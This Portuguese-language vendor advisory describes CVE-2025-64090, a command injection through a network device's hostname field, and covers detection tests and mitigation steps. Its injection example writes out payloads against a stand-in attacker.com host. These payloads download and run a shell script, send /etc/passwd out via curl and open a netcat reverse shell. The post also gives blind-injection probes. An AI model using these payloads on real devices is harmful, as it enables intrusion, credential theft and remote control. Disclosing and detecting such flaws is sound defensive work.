剣 KENSAI
CVE CRÍTICO 9 de janeiro de 2026 · 8 min de leitura

CVE-2025-64090: Injeção de comando via campo de nome de host do dispositivo permite comprometimento total do sistema

Os invasores autenticados podem executar comandos arbitrários do sistema operacional injetando metacaracteres do shell no campo do nome do host do dispositivo. CVSS 10.0. Uma classe de vulnerabilidade comum em dispositivos de rede e sistemas embarcados que produz impacto crítico de forma consistente.


CVSS 10.0 - CRÍTICO
CampoDetalhe
ID do CVECVE-2025-64090
GravidadeCRÍTICO (CVSS 3.1: 10.0)
Tipo de vulnerabilidadeInjeção de comando do sistema operacional (CWE-78)
Publicado9 de janeiro de 2026
Autenticação necessáriaSim (baixo privilégio)
Vetor de ataqueRede

O que é CVE-2025-64090?

CVE-2025-64090 é uma vulnerabilidade de injeção de comando em que o campo de configuração do nome do host do dispositivo é passado sem sanitização para um comando shell subjacente. Inserindo metacaracteres de shell (;, |, `, $()) no valor do nome do host, os invasores autenticados podem sair do contexto de comando pretendido e executar comandos arbitrários do sistema operacional com os privilégios do processo de gerenciamento do dispositivo – normalmente root.

Esta classe de vulnerabilidade é endêmica em dispositivos de rede, hardware IoT, roteadores, firewalls e sistemas Linux incorporados, onde interfaces de gerenciamento baseadas na Web criam comandos shell a partir de valores de configuração fornecidos pelo usuário sem a sanitização adequada.

⚠ Baixa barreira para o comprometimento total

Qualquer usuário autenticado — incluindo contas de baixo privilégio — pode executar comandos no nível raiz. Em ambientes onde existem credenciais padrão ou fracas, isso se torna uma exploração efetivamente não autenticada.

Mecânica de injeção de comando

# Vulnerable device sets hostname using shell command:
# system("hostname " + user_input)

# Attacker submits hostname:
newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh

# This executes as:
hostname newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh

# Other injection patterns:
# Backtick execution:
`curl http://attacker.com/$(cat /etc/passwd | base64)`

# Subshell:
$(id > /var/www/html/pwned.txt)

# Pipe:
validhost | nc attacker.com 4444 -e /bin/sh

Versões afetadas

Consulte o comunicado do fornecedor para modelos de hardware e versões de firmware específicos. Dispositivos de rede com interfaces de gerenciamento baseadas na Web que expõem a configuração do nome do host são a principal superfície de risco.

Métodos de detecção

Teste para injeção de nome de host

# Manual test: submit hostname with command injection payload
# Use time-delay to confirm blind injection
POST /admin/network/hostname
hostname=test%3Bsleep%205

# If response delays ~5 seconds: vulnerable

# Out-of-band confirmation:
hostname=test%3Bnslookup+attacker.burpcollaborator.net

🔍 Detecção KENSAI: O scanner de segurança de dispositivo KENSAI testa campos de interface de gerenciamento, incluindo nome de host, DNS, NTP e configuração SNMP para injeção de comando do sistema operacional. Os padrões CVE-2025-64090 estão incluídos nos perfis de avaliação de dispositivos de rede.

Etapas de mitigação

  1. Aplicar atualização de firmware do fornecedor imediatamente.
  2. Validação de entrada: Os campos de nome de host devem aceitar apenas caracteres alfanuméricos e hifens (compatível com RFC 952/1123).
  3. Use APIs seguras: Substitua a construção do comando shell por chamadas de sistema que aceitem listas de argumentos (sem interpolação shell).
  4. Restringir interface de gerenciamento: Limite o acesso à UI de gerenciamento a intervalos de IP confiáveis ​​por meio de regras de firewall.
  5. Alterar credenciais padrão: Certifique-se de que todas as contas de gerenciamento usem senhas fortes e exclusivas.
  6. Segmentação de rede: Isole interfaces de gerenciamento de redes acessíveis ao usuário.

Injeção de comando em seus dispositivos de rede?

KENSAI verifica dispositivos de rede e interfaces de gerenciamento em busca de vulnerabilidades de injeção de comando, incluindo CVE-2025-64090. Identifique dispositivos vulneráveis ​​antes que os invasores ganhem espaço.

Faça uma varredura gratuita dos dispositivos de rede

Publicado pela equipe de pesquisa de segurança KENSAI · Mais análises CVE

Artigos relacionados

Frankrijk meldt daling ransomware dankzij NIS2 Vulnerabilidade de configuração incorreta do CORS: guia completo para detecção e prevenção França ANSSI relata queda de ransomware